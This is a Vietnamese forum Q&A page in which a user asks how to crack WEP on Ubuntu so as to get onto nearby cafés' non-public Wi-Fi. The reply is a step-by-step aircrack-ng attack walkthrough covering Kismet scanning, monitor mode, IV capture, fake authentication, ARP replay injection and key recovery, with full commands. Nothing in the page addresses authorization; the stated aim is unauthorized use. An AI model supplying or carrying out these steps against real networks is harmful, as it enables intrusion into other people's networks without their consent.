Máy tính, Internet > Máy vi tính > Hệ điều hành khác

Làm thế nào để crack WEP trên Ubuntu?

Em mới dùng thử Ubuntu, thấy nó có nhiều cái hay. Em thấy BackTrack cũng là Linux, thì Ubuntu cũng là Linux nên Ubuntu có thể làm được như Backtrack, em có tham khảo nhiều trên các diễn đàn thấy có thể dùng Ubuntu crack đc.Nhưng toàn là tiếng anh, do non kém về Ubuntu nên đọc ko hiểu, anh chị em nào có thể help mình đc ko?(Gần nhà có mấy wa'n cafe VIP, mà nó ko public cho pà con xung quanh).

thuy linh

Đầu tiên bạn cần có card wireless có khả năng injection. Bạn có thể xem các card mạng tuơng thích ở đây. Hình như trang này ko cho các IP Việt Nam truy cập hay sao ấy, mình dùng proxy mới vào được.

1. Các tool yêu cầu:

Mã:

  kismet và bộ tool aircrack-ng
 Mô tả các tool:
  kismet : Bộ dò tìm mạng wireless và là một packet sniffer
  airmon : một công cụ giúp đỡ thiết lập card mạng ở chế độ monitor
  airodump : một công cụ để bắt gói tin từ các Access Point
  aireplay : công cụ để giả mạo các yêu cầu ARP
  aircrack : công cụ để giải mã các khóa WEP

2. Thực thi
- Bước 1 : Theo dõi lưu lượng mạng với Kismet
Mở terminal. Gõ:

Mã:

$ sudo kismet

Khi kismet dò tìm ra các mạng và rất nhiều client đang truy xuất các mạng này bạn có thể gõ 's' và sau đó 'Q'. Để sắp xếp tất cả các AP theo độ mạnh tín hiệu của chúng. Mode mặc định 'autofit' không cho phép bạn nhiều thao tác trên đó. Ấn Enter trên bất kỳ AP nào mà bạn muốn biết nhiều thông tin hơn.

- Bước 2 : Đặt card mạng ở mode monitor

Mã:

$ sudo airmon-ng start wlan0

- Bước 3 : Tập hợp dữ liệu với Airodump
Mở một terminal mới và khởi chạy airodump vì thế chúng ta có thể tập hợp ARP reply từ AP mục tiêu.

Mã:

$ sudo airodump-ng --ivs -w /home/pat109/crack --channel 10 mon0

Trong đó
mon0 : card wireless (ở mode monitor sau khi chạy airmon-ng)
-w : nói với airodump ghi tới file /home/pat109/crackwep
--channel : chỉ ra channel của AP mục tiêu (10)
--ivs : nói với airodump chỉ tập hợp các IV

- Bước 4 : Giả mạo xác thực với AP đang truy cập

Mã:

$ sudo aireplay-ng -1 0 -e abc -a 00:11:22:33:44:55 -h 00:1c:f0:a2:52:cc mon0

Trong đó:
-1 : chỉ ra kiểu tấn công. Trong trường hợp này chúng ta sẽ giả mạo xác thực với AP.
0 : chỉ ra đọ trễ của cuộc tấn công.
-e : chỉ ra essid - broadcast name của AP.
-a : chỉ ra bssid của AP. 00:11:22:33:44:55 là địa chỉ MAC của AP
-h : chỉ ra địa chỉ MAC của card mạng của bạn (00:1c:f0:a2:52:cc).
mon0 : tên card mạng

- Bước 5 : Bắt đầu chêm (injection) với aireplay

Mã:

$ sudo aireplay-ng -3 -e abc -b 00:11:22:33:44:55 -h 00:1c:f0:a2:52:cc mon0

Trong đó:
-b : yêu cầu địa chỉ MAC của AP đang truy cập
-h : địa chỉ MAC của card wireless của máy bạn.
Trước khi aireplay chạy, các gói tin ARP sẽ tăng chậm. Điều này có thể mất khá nhiều thời gian nếu không có nhiều APR request từ các máy tính khác trên mạng. Tuy nhiên khi nó chạy, lượng ARP sẽ tăng nhanh chóng. Nếu lượng ARP ngừng tăng, chỉ cần mở một terminal mới và kết hợp lại với AP thông qua bước 4.

- Bước 6 : Giải mã khóa WEP với Aircrack
Tìm vị trí của file bắt gói IV trong bước 2. Sau đó trong terminal gõ:

Mã:

$ sudo aircrack-ng -s /home/pat109/crackwep-01.ivs

Air-crack crack sau mỗi 5000 IV. Nếu aircrack chưa tìm thấy khóa ngay lập tức chỉ cần đợi cho nhiều gói dữ liệu hơn.

Máy tính, Internet > Máy vi tính > Hệ điều hành khác

Làm thế nào để crack WEP trên Ubuntu?

Hỏi đáp đề xuất

Hệ điều hành khác

Sử dụng tvants and sopcast trên ubuntu ?}

Hệ điều hành khác

Gỡ Ubuntu như thế nào ?}

Hệ điều hành khác

Cấu hình cần thiết để chạy ubuntu 9.10 ?}

Hệ điều hành khác

Làm sao để Ubuntu nhận độ phân giải 1024x768 ?}

Hệ điều hành khác

Hỏi về setup ubuntu trên ổ cứng di động ?}

Hệ điều hành khác

Upgrade ubuntu 9.04 remix sang ubuntu dektop ?}

Hệ điều hành khác

Làm sao để nghe nhạc trong hệ điều hành ubuntu 10.04?}

Hệ điều hành khác

Cài flash trên hệ điều hành ubuntu ?}

Hệ điều hành khác

Bitlocker trên Ubuntu ?}